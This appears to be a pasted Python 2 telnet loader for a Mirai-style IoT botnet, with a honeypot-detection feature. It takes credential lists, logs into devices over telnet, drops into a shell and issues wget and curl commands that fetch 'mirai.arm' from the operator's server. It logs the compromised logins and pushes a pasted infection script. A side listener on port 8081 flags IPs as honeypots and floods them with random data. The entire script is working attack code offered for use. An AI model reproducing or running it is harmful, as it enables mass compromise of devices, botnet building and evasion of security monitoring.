[HONEYPOT DETECT] PYTHON TELNET LOADER

1. #!/usr/bin/python
2. #Phaaaat hax telnet loader by Freak
3. import sys, re, os, socket, time, select
4. from threading import Thread
5. yourserverip = "0.0.0.0"
6. rekdevice = """paste update.sh/bins.sh here""".replace("\r", "").split("\n")
7.  
8. global fh
9. fh = open("bots.txt","a+")
10.  
11. def chunkify(lst,n):
12. return [ lst[i::n] for i in xrange(n) ]
13.  
14. running = 0
15.  
16. global echo
17. global tftp
18. global wget
19. global logins
20. global echoed
21. echoed = []
22. tftp = 0
23. wget = 0
24. echo = 0
25. logins = 0
26. ran = 0
27. def printStatus():
28. global echo
29. global tftp
30. global wget
31. global logins
32. global ran
33. while 1:
34. time.sleep(5)
35. print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + " Ran:" + str(ran) + " Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
36.  
37. def readUntil(tn, advances, timeout=8):
38. buf = ''
39. start_time = time.time()
40. while time.time() - start_time < timeout:
41. buf += tn.recv(1024)
42. time.sleep(0.1)
43. for advance in advances:
44. if advance in buf: return buf
45. return ""
46.  
47. def recvTimeout(sock, size, timeout=8):
48. sock.setblocking(0)
49. ready = select.select([sock], [], [], timeout)
50. if ready[0]:
51. data = sock.recv(size)
52. return data
53. return ""
54.  
55. def contains(data, array):
56. for test in array:
57. if test in data:
58. return True
59. return False
60.  
61. def split_bytes(s, n):
62. assert n >= 4
63. start = 0
64. lens = len(s)
65. while start < lens:
66. if lens - start <= n:
67. yield s[start:]
68. return # StopIteration
69. end = start + n
70. assert end > start
71. yield s[start:end]
72. start = end
73. global badips
74. global goodips
75. badips=[]
76. goodips=[]
77. def fileread():
78. fh=open("honeypots.txt", "rb")
79. data=fh.read()
80. fh.close()
81. return data
82. def clientHandler(c, addr):
83. global badips
84. global goodips
85. try:
86. if addr[0] not in badips and addr[0] not in fileread():
87. print addr[0] + ":" + str(addr[1]) + " has connected!"
88. request = recvTimeout(c, 8912)
89. if "curl" not in request and "Wget" not in request:
90. if addr[0] not in fileread():
91. fh=open("honeypots.txt", "a")
92. fh.write(addr[0]+"\n")
93. fh.close()
94. badips.append(addr[0])
95. print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!"
96. c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
97. for i in range(10):
98. c.send(os.urandom(65535*2))
99. else:
100. if addr[0] not in goodips:
101. print addr[0] + ":" + str(addr[1]) + " is a good IP!"
102. goodips.append(addr[0])
103. else:
104. c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
105. for i in range(10):
106. c.send(os.urandom(65535*2))
107. c.close()
108. except Exception as e:
109. #print str(e)
110. pass
111.  
112. def honeyserver():
113. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
114. s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
115. s.bind(('', 8081))
116. s.listen(999999999)
117. while 1:
118. try:
119. c, addr = s.accept()
120. Thread(target=clientHandler, args=(c, addr,)).start()
121. except:
122. pass
123.  
124. Thread(target=honeyserver, args=()).start()
125. def infect(ip, username, password):
126. global badips
127. global goodips
128. global echo
129. global tftp
130. global wget
131. global logins
132. global ran
133. global echoed
134. if ip in echoed:
135. return
136. infectedkey = "bigB04t"
137. try:
138. tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
139. tn.settimeout(1)
140. tn.connect((ip, 23))
141. except:
142. try:
143. tn.close()
144. except:
145. pass
146. return
147. try:
148. hoho = ''
149. hoho += readUntil(tn, ":")
150. if ":" in hoho:
151. tn.send(username + "\n")
152. time.sleep(0.1)
153. hoho = ''
154. hoho += readUntil(tn, ":")
155. if ":" in hoho:
156. tn.send(password + "\n")
157. time.sleep(0.8)
158. else:
159. pass
160. prompt = ''
161. prompt += recvTimeout(tn, 8192)
162. if ">" in prompt and "ONT" not in prompt:
163. success = True
164. elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
165. success = True
166. else:
167. tn.close()
168. return
169. except:
170. tn.close()
171. return
172. if success == True:
173. try:
174. tn.send("enable\r\n")
175. tn.send("system\r\n")
176. tn.send("shell\r\n")
177. tn.send("sh\r\n")
178. tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
179. except:
180. tn.close()
181. return
182. time.sleep(1)
183. try:
184. buf = recvTimeout(tn, 8192)
185. except:
186. tn.close()
187. return
188. try:
189. if "AK47" in buf:
190. logins += 1
191. fh.write(ip + ":23 " + username + ":" + password + "\n")
192. fh.flush()
193. tn.send("wget http://" + yourserverip + "/mirai.arm &\r\n");
194. tn.send("curl http://" + yourserverip + ":8081/mirai.arm &\r\n");
195. time.sleep(3)
196. recvTimeout(tn, 8192)
197. if ip in goodips:
198. tn.send(rekdevice)
199. tn.close()
200. except Exception as e:
201. #print str(e)
202. pass
203.  
204. else:
205. # tn.close()
206. return
207.  
208. def check(chunk, fh):
209. global running
210. running += 1
211. threadID = running
212. for login in chunk:
213. try:
214. if ":23 " in login:
215. login = login.replace(":23 ", ":")
216. port = 23
217. if ":2323 " in login:
218. login = login.replace(":2323 ", ":")
219. port = 2323
220. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
221. s.settimeout(1)
222. try:
223. socket.inet_aton(login.split(":")[0])
224. ip = login.split(":")[0]
225. username = login.split(":")[1]
226. password = login.split(":")[2]
227. except:
228. try:
229. socket.inet_aton(login.split(":")[2])
230. ip = login.split(":")[2]
231. username = login.split(":")[0]
232. password = login.split(":")[1]
233. except:
234. continue
235. s.connect((ip, port))
236. s.close()
237. infect(ip, username, password)
238. except:
239. pass
240. running -= 1
241. while 1:
242. try:
243. while running >= 256:
244. time.sleep(0.3)
245. Thread(target = check, args = ([raw_input()], fh,)).start()
246. except KeyboardInterrupt:
247. os.kill(os.getpid(), 9)
248. except Exception:
249. pass
250.